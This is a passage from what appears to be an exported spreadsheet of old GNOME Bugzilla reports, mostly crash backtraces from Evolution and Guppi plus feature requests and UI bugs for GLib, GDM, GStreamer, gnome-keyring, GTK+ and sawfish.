#1  0x411677b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403c492e in waitpid (pid=11350 stat_loc=0xbfffee4c options=0)
    at wrapsyscall.c:172
#3  0x40ba99c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x080af559 in segv_redirect (sig=11) at main.c:71
#5  0x403c24f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135955072 esi = 16 ebp = 3221221912 esp = 3221221900 ebx = 135955200 edx = 59989 ecx = 16 eax = 4294967292 trapno = 0 err = 0 eip = 1091658312 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221221900 ss = 43 __ssh = 0 fpstate = 0xbfffef90 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x41116248 in __poll (fds=0x81a8280 nfds=16 timeout=599879)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40ef2a74 in g_main_poll (timeout=599879 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40ef2465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40ef2725 in g_main_iteration (block=1) at gmain.c:907
#11 0x40e0f443 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#12 0x080a1dea in mail_msg_wait (msgid=38) at mail-mt.c:305
#13 0x0807565d in owner_set_cb (shell_component=0x8149a58 
    shell_client=0x814ed50 
    evolution_homedir=0x814eb78 /home/cgoheen/evolution user_data=0x0)
    at component-factory.c:776
#14 0x40e10a2c in gtk_marshal_NONE__POINTER_POINTER ()
   from /usr/lib/libgtk-1.2.so.0
#15 0x40e40046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#16 0x40e3f4a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#17 0x40e3d51c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x401e8050 in impl_setOwner (servant=0x8149ab4 shell=0x814d7d0 
    evolution_homedir=0x814eb78 /home/cgoheen/evolution ev=0xbffff770)
    at evolution-shell-component.c:432
#19 0x401c47cb in _ORBIT_skel_GNOME_Evolution_ShellComponent_setOwner (
    _ORBIT_servant=0x8149ab4 _ORBIT_recv_buffer=0x8147078 ev=0xbffff770 
    _impl_setOwner=0x401e7f10 ) at Evolution-skels.c:2033
#20 0x40d43210 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#21 0x40d45492 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#22 0x40d456b9 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#23 0x40d5ace4 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#24 0x40d06aa9 in orb_handle_connection (source=0x814c438 cond=G_IO_IN 
    cnx=0x814c398) at oaf-mainloop.c:70
#25 0x40ef0a7a in g_io_unix_dispatch (source_data=0x814c450 
    current_time=0xbffff900 user_data=0x814c398) at giounix.c:137
#26 0x40ef2055 in g_main_dispatch (dispatch_time=0xbffff900) at gmain.c:656
#27 0x40ef2659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x40ef27e8 in g_main_run (loop=0x814d350) at gmain.c:935
#29 0x40e0f203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#30 0x4049253b in bonobo_main () from /usr/lib/libbonobo.so.2
#31 0x080af7e1 in main (argc=3 argv=0xbffffb24) at main.c:160
#32 0x41053336 in __libc_start_main (main=0x80af5a4  argc=3 
    ubp_av=0xbffffb24 init=0x806b7b4  fini=0x80ee6c0  
    rtld_fini=0x4000d2fc  stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 3076 (LWP 11349)):
#0  0x410659b6 in __sigsuspend (set=0xbf3ff91c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x403c1d6d in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x403bdee4 in pthread_cond_wait (cond=0x8174dec mutex=0x8174dd4)
    at restart.h:34
#3  0x401a4aa0 in e_mutex_lock (m=0x8174dc8) at e-msgport.c:767
#4  0x400ab275 in camel_store_get_folder (store=0x8174ac0 
    folder_name=0x81a8319 home/cgoheen/evolution/local/Drafts flags=1 
    ex=0x81a3df8) at camel-store.c:265
#5  0x080acdf5 in mail_tool_uri_to_folder (
    uri=0x81a5a48 file:///home/cgoheen/evolution/local/Drafts flags=1 
    ex=0x81a3df8) at mail-tools.c:325
#6  0x080a54e9 in get_folder_get (mm=0x81a3de0) at mail-ops.c:1285
#7  0x080a2379 in mail_msg_received (e=0x8149630 msg=0x81a3de0 data=0x0)
    at mail-mt.c:503
#8  0x401a44c1 in thread_received_msg (e=0x8149630 m=0x81a3de0)
    at e-msgport.c:518
#9  0x401a4646 in thread_dispatch (din=0x8149630) at e-msgport.c:599
#10 0x403bef87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 2051 (LWP 11346)):
#0  0x410659b6 in __sigsuspend (set=0xbf5ff430)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x403c1d6d in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x403c3acb in __pthread_alt_lock (lock=0x8105cd8 self=0x0) at restart.h:34
#3  0x403bffb6 in __pthread_mutex_lock (mutex=0x8105cc8) at mutex.c:120
#4  0x080af59c in segv_redirect (sig=11) at main.c:80
#5  0x403c24f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 134586740 esi = 1870030127 ebp = 3210738012 esp = 3210737876 ebx = 1073830040 edx = 135457096 ecx = 0 eax = 1073831564 trapno = 14 err = 4 eip = 1073775497 cs = 35 __csh = 0 eflags = 2163270 esp_at_signal = 3210737876 ss = 43 __ssh = 0 fpstate = 0xbf5ff658 oldmask = 2147483648 cr2 = 1870030175}) at signals.c:97
#6  
#7  0x40008389 in _dl_lookup_symbol (undef_name=0x805a173 xmlNewDocNode 
    undef_map=0x40015f38 ref=0xbf5ff98c symbol_scope=0x400160d4 
    type_class=1 explicit=0) at do-lookup.h:67
#8  0x4000ca69 in fixup (l=0x40015f38 reloc_offset=1091991472)
    at dl-runtime.c:98
#9  0x4000cba0 in _dl_runtime_resolve () from /lib/ld-linux.so.2
#10 0x080a052c in mls_get_folder (store=0x8174ac0 
    folder_name=0x8177e09 home/cgoheen/evolution/local/local-archive 
    flags=1 ex=0x8177a18) at mail-local.c:806
#11 0x400ab2e8 in camel_store_get_folder (store=0x8174ac0 
    folder_name=0x8177e09 home/cgoheen/evolution/local/local-archive 
    flags=1 ex=0x8177a18) at camel-store.c:277
#12 0x080acdf5 in mail_tool_uri_to_folder (
    uri=0x8177ad8 file:///home/cgoheen/evolution/local/local-archive 
    flags=1 ex=0x8177a18) at mail-tools.c:325
#13 0x080a54e9 in get_folder_get (mm=0x8177a00) at mail-ops.c:1285
#14 0x080a2379 in mail_msg_received (e=0x8149580 msg=0x8177a00 data=0x0)
    at mail-mt.c:503
#15 0x401a44c1 in thread_received_msg (e=0x8149580 m=0x8177a00)
    at e-msgport.c:518
#16 0x401a4646 in thread_dispatch (din=0x8149580) at e-msgport.c:599
#17 0x403bef87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 11345)):
#0  0x410659b6 in __sigsuspend (set=0xbf7ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x403c1d6d in __pthread_wait_for_restart_signal (self=0xbf7ffc00)
    at pthread.c:969
#2  0x403bdee4 in pthread_cond_wait (cond=0x8149570 mutex=0x8149550)
    at restart.h:34
#3  0x401a3e52 in e_msgport_wait (mp=0x8149528) at e-msgport.c:198
#4  0x401a45bc in thread_dispatch (din=0x81494d0) at e-msgport.c:566
#5  0x403bef87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 11344)):
#0  0x41116248 in __poll (fds=0x816a4fc nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x403bed0e in __pthread_manager (arg=0x1d) at manager.c:140
Thread 1 (Thread 1024 (LWP 11299)):
#0  0x410eb369 in __wait4 () at __wait4:-1
#1  0x411677b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x403c492e in waitpid (pid=11350 stat_loc=0xbfffee4c options=0)
    at wrapsyscall.c:172
#3  0x40ba99c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x080af559 in segv_redirect (sig=11) at main.c:71
#5  0x403c24f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135955072 esi = 16 ebp = 3221221912 esp = 3221221900 ebx = 135955200 edx = 59989 ecx = 16 eax = 4294967292 trapno = 0 err = 0 eip = 1091658312 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221221900 ss = 43 __ssh = 0 fpstate = 0xbfffef90 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x41116248 in __poll (fds=0x81a8280 nfds=16 timeout=599879)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40ef2a74 in g_main_poll (timeout=599879 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40ef2465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40ef2725 in g_main_iteration (block=1) at gmain.c:907
#11 0x40e0f443 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#12 0x080a1dea in mail_msg_wait (msgid=38) at mail-mt.c:305
#13 0x0807565d in owner_set_cb (shell_component=0x8149a58 
    shell_client=0x814ed50 
    evolution_homedir=0x814eb78 /home/cgoheen/evolution user_data=0x0)
    at component-factory.c:776
#14 0x40e10a2c in gtk_marshal_NONE__POINTER_POINTER ()
   from /usr/lib/libgtk-1.2.so.0
#15 0x40e40046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#16 0x40e3f4a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#17 0x40e3d51c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x401e8050 in impl_setOwner (servant=0x8149ab4 shell=0x814d7d0 
    evolution_homedir=0x814eb78 /home/cgoheen/evolution ev=0xbffff770)
    at evolution-shell-component.c:432
#19 0x401c47cb in _ORBIT_skel_GNOME_Evolution_ShellComponent_setOwner (
    _ORBIT_servant=0x8149ab4 _ORBIT_recv_buffer=0x8147078 ev=0xbffff770 
    _impl_setOwner=0x401e7f10 ) at Evolution-skels.c:2033
#20 0x40d43210 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#21 0x40d45492 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#22 0x40d456b9 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#23 0x40d5ace4 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#24 0x40d06aa9 in orb_handle_connection (source=0x814c438 cond=G_IO_IN 
    cnx=0x814c398) at oaf-mainloop.c:70
#25 0x40ef0a7a in g_io_unix_dispatch (source_data=0x814c450 
    current_time=0xbffff900 user_data=0x814c398) at giounix.c:137
#26 0x40ef2055 in g_main_dispatch (dispatch_time=0xbffff900) at gmain.c:656
#27 0x40ef2659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#28 0x40ef27e8 in g_main_run (loop=0x814d350) at gmain.c:935
#29 0x40e0f203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#30 0x4049253b in bonobo_main () from /usr/lib/libbonobo.so.2
#31 0x080af7e1 in main (argc=3 argv=0xbffffb24) at main.c:160
#32 0x41053336 in __libc_start_main (main=0x80af5a4  argc=3 
    ubp_av=0xbffffb24 init=0x806b7b4  fini=0x80ee6c0  
    rtld_fini=0x4000d2fc  stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:129
0x410eb369	-1	in __wait4
#0  0x410eb369 in __wait4 () at __wait4:-1
-1	in __wait4
No locals.
#1  0x411677b0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x403c492e in waitpid (pid=11350 stat_loc=0xbfffee4c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffee4c
options = 0
result = 0
oldtype = 0
#3  0x40ba99c6 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x080af559 in segv_redirect (sig=11) at main.c:71
	in main.c
sig = -1073746164
#5  0x403c24f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135955072 esi = 16 ebp = 3221221912 esp = 3221221900 ebx = 135955200 edx = 59989 ecx = 16 eax = 4294967292 trapno = 0 err = 0 eip = 1091658312 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221221900 ss = 43 __ssh = 0 fpstate = 0xbfffef90 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	in signals.c
self = 0x403cb4a0
in_sighandler = 0x0
self = 0x403cb4a0
in_sighandler = 0x0
#6  
No locals.
#7  0x41116248 in __poll (fds=0x81a8280 nfds=16 timeout=599879)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x81a8280
nfds = 3221220940
timeout = -1073746032
resultvar = 135955072
Unknown reporter: cgoheen@atgi.net changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>evolution-mail-maintainers</t>
  </si>
  <si>
    <t>cgoheen</t>
  </si>
  <si>
    <t>GLIB-59544</t>
  </si>
  <si>
    <t>GLIB</t>
  </si>
  <si>
    <t>Provide closure support for GMain</t>
  </si>
  <si>
    <t>The GMain sources should be able to be connected to closures
as well as C functions. This could be done with hooks or could
be done by moving GMain into libgobject.</t>
  </si>
  <si>
    <t>gtkdev</t>
  </si>
  <si>
    <t>GGV-90943</t>
  </si>
  <si>
    <t>GGV</t>
  </si>
  <si>
    <t>Ui Isuue with ggv</t>
  </si>
  <si>
    <t>The spin button on left top of the main window which was used to set the
display maginify rate doesn't not work properly.
Some time when you press the up button only once the number may increase
continuously without more input .
Some time  when it display 17 i press up button it then display 27%.
but immediately it will return 17% automatically.
To reproduce bug:
   1) excute ggv
   2) press the up and down button of the spin box in the left up 
      conner of main   window .
Justification:
The funciton of the user interface is not correct.</t>
  </si>
  <si>
    <t>jaka</t>
  </si>
  <si>
    <t>satyajit.kanungo</t>
  </si>
  <si>
    <t>GDM-457958</t>
  </si>
  <si>
    <t>GDM</t>
  </si>
  <si>
    <t>Hardcodes /sbin/nologin</t>
  </si>
  <si>
    <t>Hi
gdm 2.19 series hardcode the nologin location to /sbin/nologin but it's /usr/sbin/nologin in Debian this should be detected by configure.
Bye</t>
  </si>
  <si>
    <t>gdm-maint</t>
  </si>
  <si>
    <t>EVOLUTION-218273</t>
  </si>
  <si>
    <t>Contacts</t>
  </si>
  <si>
    <t>scrollbar arrow widget should move the contact list based on width of columns</t>
  </si>
  <si>
    <t>Description of Problem:
If you have many contacts (couple hundred) and you adjust the column width
to show two columns of contacts it would be nice if when clicking the
arrow on the scrollbar the contact list scrolled based on the width of the
column.  Ie you get the next two columns of contacts displayed on your
screen rather than a random scroll amount.</t>
  </si>
  <si>
    <t>sdevashish</t>
  </si>
  <si>
    <t>jstrand1</t>
  </si>
  <si>
    <t>PKG-CONFIG-142952</t>
  </si>
  <si>
    <t>Reorders the Libs: content</t>
  </si>
  <si>
    <t>% cat /opt/gnome/lib/pkgconfig/evolution-sharp.pc
prefix=/opt/gnome
libdir=${prefix}/lib
Name: Evolution#
Description: Evolution# - Evolution .NET Binding
Version: 0.3
Libs: -lib:${libdir} -r:evolution-sharp
% pkg-config --libs evolution-sharp
-r:evolution-sharp -lib:/opt/gnome/lib
It's comparable to reordering -L and -l parameters for gcc it practically
breaks compilation.</t>
  </si>
  <si>
    <t>tommi.komulainen</t>
  </si>
  <si>
    <t>GUPPI-67853</t>
  </si>
  <si>
    <t>GUPPI</t>
  </si>
  <si>
    <t>Seg Fault when creating graph</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Guppi
Severity: normal
Version: 0.40.2
Synopsis: Seg Fault when creating graph
Bugzilla-Product: Guppi
Bugzilla-Component: General
Description:
Selected 'Graph Guru' in Gnumeric 1.0 on a blank spreadsheet chose pie
chart and guppi-gnumeric seg faulted when I clicked 'Next'
Debugging Information:
0x40a3a5a9 in __wait4 () from /lib/libc.so.6
#0  0x40a3a5a9 in __wait4 () from /lib/libc.so.6
#1  0x40aa2ad8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4051ba37 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  gup_gnm_series_get_dimension (series=0x0 
    target_dim_name=0x80661d3 values) at guppi-gnumeric-xml.c:89
#5  0x8058336 in gup_gnm_series_dim_get_vector (series=0x0 
    dim_name=0x80661d3 values graph=0x80c790c) at guppi-gnumeric-xml.c:109
#6  0x805838a in gup_gnm_series_dim_get_scalar (series=0x0 
    dim=0x80661d3 values graph=0x80c790c) at guppi-gnumeric-xml.c:123
#7  0x805c309 in pie_plot (graph=0x80c790c plot=0x811f910)
    at guppi-gnumeric-plot-pie.c:61
#8  0x8056c5a in gup_gnm_graph_make_plot (graph=0x80c790c)
    at guppi-gnumeric-graph.c:333
#9  0x805754c in gup_gnm_graph_regenerate_plots (graph=0x80c790c)
    at guppi-gnumeric-graph.c:578
#10 0x8057cdf in gup_gnm_graph_markup_spec (graph=0x80c790c)
    at guppi-gnumeric-graph.c:827
#11 0x8057edc in gup_gnm_graph_set_spec (graph=0x80c790c doc=0x80f3b18 
    copy=1) at guppi-gnumeric-graph.c:892
#12 0x8059e6e in impl_applyChanges (servant=0x80c2dfc ev=0xbffff420)
    at guppi-gnumeric-config-guru.c:64
#13 0x80520c6 in _ORBIT_skel_GNOME_Gnumeric_Graph_v1_ConfigGuru_applyChanges (
    _ORBIT_servant=0x80c2dfc _ORBIT_recv_buffer=0x80c0860 ev=0xbffff420 
    _impl_applyChanges=0x8059e10 )
    at GNOME_Gnumeric_Graph-skels.c:372
#14 0x4094a1a6 in ORBit_POA_handle_request (recv_buffer=0x80c0860 
    poa=0x80bb9b0) at orbit_poa.c:513
#15 0x4094c828 in ORBit_handle_incoming_request (recv_buffer=0x80c0860)
    at server.c:90
#16 0x4094ca81 in ORBit_handle_incoming_message (recv_buffer=0x80c0860)
    at server.c:160
#17 0x4096464b in giop_main_handle_connection (connection=0x80c0ce0)
    at connection.c:1214
#18 0x403ce450 in orb_handle_connection (source=0x80c28a8 cond=G_IO_IN 
    cnx=0x80c0ce0) at oaf-mainloop.c:70
#19 0x4097f3b0 in g_io_unix_dispatch (source_data=0x80c28c0 
    current_time=0xbffff604 user_data=0x80c0ce0) at giounix.c:135
#20 0x40980c46 in g_main_dispatch (dispatch_time=0xbffff604) at gmain.c:656
#21 0x40981273 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#22 0x4098143c in g_main_run (loop=0x80c07c0) at gmain.c:935
#23 0x406d2dec in gtk_main () at gtkmain.c:524
#24 0x4039c92d in bonobo_main () at bonobo-main.c:283
#25 0x805c8a6 in main (argc=3 argv=0xbffff734) at guppi-gnumeric.c:148
#26 0x409b1baf in __libc_start_main () from /lib/libc.so.6
#0  0x40a3a5a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40aa2ad8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4051ba37 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 0
signum = -512
in_segv = 1
pid = 0
#3  
No locals.
#4  gup_gnm_series_get_dimension (series=0x0 
    target_dim_name=0x80661d3 values) at guppi-gnumeric-xml.c:89
89		for (dim = series-&gt;xmlChildrenNode dim != NULL  dim = dim-&gt;next) {
series = (xmlNode *) 0xfffffe00
dim = (xmlNode *) 0x8
dim_name = (xmlChar *) 0x811f950 
#5  0x8058336 in gup_gnm_series_dim_get_vector (series=0x0 
    dim_name=0x80661d3 values graph=0x80c790c) at guppi-gnumeric-xml.c:109
109		xmlNode *dim = gup_gnm_series_get_dimension (series dim_name)
series = (xmlNode *) 0x0
dim_name = 0xfffffe00 
graph = (GupGnmGraph *) 0xfffffe00
dim = (xmlNode *) 0xfffffe00
#6  0x805838a in gup_gnm_series_dim_get_scalar (series=0x0 
    dim=0x80661d3 values graph=0x80c790c) at guppi-gnumeric-xml.c:123
123		GupGnmVector *vec = gup_gnm_series_dim_get_vector (series dim graph)
series = (xmlNode *) 0xbfffeed8
dim = 0x0
graph = (GupGnmGraph *) 0xfffffe00
vec = (GupGnmVector *) 0xfffffe00
#7  0x805c309 in pie_plot (graph=0x80c790c plot=0x811f910)
    at guppi-gnumeric-plot-pie.c:61
61		values = gup_gnm_series_dim_get_scalar (series values graph)
graph = (GupGnmGraph *) 0x80c790c
plot = (xmlNode *) 0x0
palette = (GuppiColorPalette *) 0x80c790c
pie_state = (GuppiElementState *) 0xfffffe00
desc = (xmlNode *) 0x811f950
radians_of_first_pie = 0
separation_percent_of_radius = 0
series = (xmlNode *) 0x0
values = (GuppiSeqScalar *) 0x811f950
cat = (GuppiSeqString *) 0x0
***********************************************************************
CONFIDENTIALITY. This e-mail and any attachments are
confidential and may also be privileged. If you are not the
named recipient please notify the sender immediately and
do not disclose the contents to another person use it for any
purpose or store or copy the information in any medium. Any
views expressed in this message are those of the individual
sender except where the sender specifically states them to
be the views of Pinnacle Insurance Plc.
If you have received this e-mail in error please immediately
notify our Helpdesk on +44 (0) 20 8207 9555.
This footnote also confirms that this email message has been
swept by MIMEsweeper for the presence of computer viruses.
www.mimesweeper.com
**********************************************************************
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-02 08:54 -------
The original reporter (james.ogley@pinnacle.co.uk) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component trow@gnu.org.
</t>
  </si>
  <si>
    <t>james.ogley</t>
  </si>
  <si>
    <t>GSTREAMER-637300</t>
  </si>
  <si>
    <t>gstreamer (core)</t>
  </si>
  <si>
    <t>[API] request pad based on caps</t>
  </si>
  <si>
    <t>We should add new API to core to make requesting pads based on caps possible (dynamically).
The normal way doesn't work for encodebin because it has quasi-dynamic pad templates that depend on the configured encoding profile but pad templates can't actually be dynamic and so in encodebin's case they only have ANY caps on them which means that code that wants to create a request pad for certain caps can't just iterate the templates and intersect to find the right template.
Wim suggested just creating a new template and setting the desired caps on that and passing that to the request pad vfunc implementation but I don't know of any request_pad_new implementations that expect such behaviour and don't assume that the pad template is one of the ones it set up before.
The easiest way would be to just create a new function/vfunc with an additional GstCaps * argument (and maybe deprecate the old one).
Alternatively one could go for just adding a new func/vfunc with direction+caps since template+name are most likely not of interest in this use case.</t>
  </si>
  <si>
    <t>gstreamer-bugs</t>
  </si>
  <si>
    <t>t.i.m</t>
  </si>
  <si>
    <t>GNOME-KEYRING-460902</t>
  </si>
  <si>
    <t>prompting</t>
  </si>
  <si>
    <t>GNOME-KEYRING</t>
  </si>
  <si>
    <t>keyring dialog is not modal</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/114963
Binary package hint: gnome-keyring
My laptop booted. NetworkManager asked to for access to the key ring. I started typing my password only to look up on the screen and see that a terminal which was launched as part of my session CONTAINED MY PASSWORD TYPED IN FULL VIEW. I was going to give a talk. About 35 people read the password.
Houston we have a problem with modal dialogs here.
...</t>
  </si>
  <si>
    <t>gnome-keyring-maint</t>
  </si>
  <si>
    <t>SOUND-JUICER-517996</t>
  </si>
  <si>
    <t>SOUND-JUICER</t>
  </si>
  <si>
    <t>Document keyboard shortcuts for editing</t>
  </si>
  <si>
    <t>Sound-juicer should support keyboard shortcuts when editing the metadata. Specifically rather than having to click 3 times on the track title to edit at a particular location the F2 + arrow keys could be used to reduce the amount mouse usage.
Other information:</t>
  </si>
  <si>
    <t>gnome-user-docs-maint</t>
  </si>
  <si>
    <t>jswitzer</t>
  </si>
  <si>
    <t>EVOLUTION-207612</t>
  </si>
  <si>
    <t>Mailer crashes on check</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: 0.12.99
Synopsis: Mailer crashes on check
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Have evolution check POP account.  Mail component crashes immediately.  
Debugging Information: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0x409cff89 in wait4 () from /lib/libc.so.6
#0  0x409cff89 in wait4 () from /lib/libc.so.6
#1  0x40a39b4c in __check_rhosts_file () from /lib/libc.so.6
#2  0x406a5183 in waitpid () from /lib/libpthread.so.0
#3  0x402df708 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x8097d74 in message_browser_get_type ()
#5  0x406a2dd4 in pthread_sighandler () from /lib/libpthread.so.0
#6  0x40959a28 in sigaction () from /lib/libc.so.6
#7  0x405a6d49 in g_main_is_running () from /usr/lib/libglib-1.2.so.0
#8  0x405a66fd in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#9  0x405a6aac in g_main_run () from /usr/lib/libglib-1.2.so.0
#10 0x404bac57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#11 0x4079c9ed in bonobo_main () from /usr/lib/libbonobo.so.2
#12 0x8097f0a in main ()
#13 0x4094a2db in __libc_start_main () from /lib/libc.so.6
#0  0x409cff89 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40a39b4c in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x406a5183 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x402df708 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x8097d74 in message_browser_get_type ()
No symbol table info available.
#5  0x406a2dd4 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  0x40959a28 in sigaction () from /lib/libc.so.6
No symbol table info available.
#7  0x405a6d49 in g_main_is_running () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
Unknown reporter: vwb2@psu.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>evolution-triage</t>
  </si>
  <si>
    <t>vwb2</t>
  </si>
  <si>
    <t>GTK+-476823</t>
  </si>
  <si>
    <t>[obsolete] Backend: directfb</t>
  </si>
  <si>
    <t>GTK+</t>
  </si>
  <si>
    <t>Text coming as black rectangles</t>
  </si>
  <si>
    <t>Please describe the problem:
The places where the text should appear is coming as black rectangles
Steps to reproduce:
1. Run testpixbuf in gtk+-2.11.6/demos
2. The text is coming as black rectangles
3. 
Actual results:
Expected results:
The text should display correctly in a readable form
Does this happen every time?
Always
Other information:</t>
  </si>
  <si>
    <t>gtk-bugs</t>
  </si>
  <si>
    <t>renymathara</t>
  </si>
  <si>
    <t>WEBSITE-356286</t>
  </si>
  <si>
    <t>blogs.gnome.org</t>
  </si>
  <si>
    <t>WEBSITE</t>
  </si>
  <si>
    <t>Urls with '+' sign like launchpad ones are wrongly autolinked</t>
  </si>
  <si>
    <t>Please describe the problem:
When you enter some url in a comment it gets autolinked but when the url contains a '+' sign it just stops at that point. So for example all urls for launchpad.net services fail see it on the tenth comment in this[1] blog entry.
[1] http://blogs.gnome.org/view/crispin/2006/09/14/0#comments
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>jdub</t>
  </si>
  <si>
    <t>nbenitezl</t>
  </si>
  <si>
    <t>SAWFISH-104778</t>
  </si>
  <si>
    <t>SAWFISH</t>
  </si>
  <si>
    <t>sawfish won't register with gnome2</t>
  </si>
  <si>
    <t xml:space="preserve">Package: sawfish
Severity: major
Version: 1.2-gtk2
Synopsis: sawfish won't register with gnome2
Bugzilla-Product: sawfish
Bugzilla-Component: general
Description:
Description of Problem:
I can't get gnome2 to see sawfish even when its running.
It claims that window-manager  has not registered.
In general how the heck am I supposed to switch wm's in gnome2?
Steps to reproduce the problem:
1. Start gnome with no wm or quit the wm or such
2. run sawfish from a terminal (if you can focus one)
3. It runs fine. Now try Applications ---&gt; Desktop Prefs ---&gt; Window
Actual Results:
Dialog box: Window manager  has not registered so gnome cannot
open its config tool.
Expected Results:
it runs sawfish-ui
How often does this happen?
All the time.
Additional Information:
There is no tool to choose wm!
I switched to sawfish by killing my old wm somehow getting focus to
a new window and running sawfish. But gnome doesn't see it.
I first got metacity by running metacity --replace.  But sawfish
doesn't
have such an option.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-29 23:49 -------
Unknown version unspecified in product sawfish. Setting version to 1.0.
Reassigning to the default owner of the component jsh@pixelslut.com.
</t>
  </si>
  <si>
    <t>jsh</t>
  </si>
  <si>
    <t>ctwardy</t>
  </si>
  <si>
    <t>GVFS-519651</t>
  </si>
  <si>
    <t>gphoto backend</t>
  </si>
  <si>
    <t>GVFS</t>
  </si>
  <si>
    <t>write support in gphoto2 backend</t>
  </si>
  <si>
    <t>We want write support in the gphoto2 backend.</t>
  </si>
  <si>
    <t>EVOLUTION-209562</t>
  </si>
  <si>
    <t>Application crash after mail received</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.13.99
Synopsis: Application crash after mail received
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Every time I hit the send/receive button my mail is downloaded and
then I get an error message saying my inbox is unreadable (or something
along those lines).  I then cannot access my inbox unless I restart the
program.  
I also get an error message saying I can't delete my trash bin due to
